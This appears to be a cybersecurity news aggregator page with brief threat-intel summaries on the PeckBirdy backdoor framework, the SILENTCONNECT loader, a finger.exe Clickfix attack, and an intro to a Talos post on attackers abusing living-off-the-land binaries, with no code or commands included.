Jan 27
China-Aligned Hackers Go Modular with PeckBirdy
China-linked threat groups are using the PeckBirdy framework to abuse built-in system tools and deploy modular backdoors across Asian targets.
Source: Trend Micro
Read more: CyberSecBrief
seen from Japan
seen from Yemen
seen from Russia
seen from United States
seen from United States
seen from United States
seen from United States
seen from Argentina
seen from Türkiye
seen from Türkiye
seen from United States
seen from United States
seen from Malaysia
seen from Türkiye
seen from Italy
seen from Estonia
seen from Italy
seen from Malaysia
seen from Malaysia
seen from United States
China-Aligned Hackers Go Modular with PeckBirdy
China-linked threat groups are using the PeckBirdy framework to abuse built-in system tools and deploy modular backdoors across Asian targets.
Source: Trend Micro
Read more: CyberSecBrief
SILENTCONNECT Uses Fake Invites to Deploy ScreenConnect
The SILENTCONNECT loader exploits phishing emails and LOLBins to install ScreenConnect, bypassing security controls and running C# code from Google Drive in memory via PowerShell.
Source: Elastic Security Labs
Read more: CyberSecBrief
'Clickfix Attack' Exploits finger.exe Utility for Stealthy Remote Code Execution (RCE)
Read the full report on -
CyberDudeBivash News delivers daily cybersecurity threat intel, CVE alerts, malware trends, and crypto security briefings.
A blog from the world class Intelligence Group, Talos, Cisco's Intelligence Group
Attackers' trends tend to come and go. But one popular technique we're seeing at this time is the use of living-off-the-land binaries — or "LoLBins". LoLBins are used by different actors combined with fileless malware and legitimate cloud services to improve chances of staying undetected within an organisation, usually during post-exploitation attack phases. Living-off-the-land tactics mean that attackers are using pre-installed tools to carry out their work. This makes it more difficult for defenders to detect attacks and researchers to identify the attackers behind the campaign. In the attacks we're seeing, there are binaries supplied by the victim's operating system that are normally used for legitimate purposes, but in these cases, are being abused by the attackers. In this post, we will take a look at the use of LOLBins through the lense of Cisco's product telemetry. We'll also walk through the most frequently abused Windows system binaries and measure their usage by analyzing data from Cisco AMP for Endpoints. You'll also find an overview of a few recent campaigns we've seen using LoLBins, along with recommendations for how to detect malicious LoLBins' activities.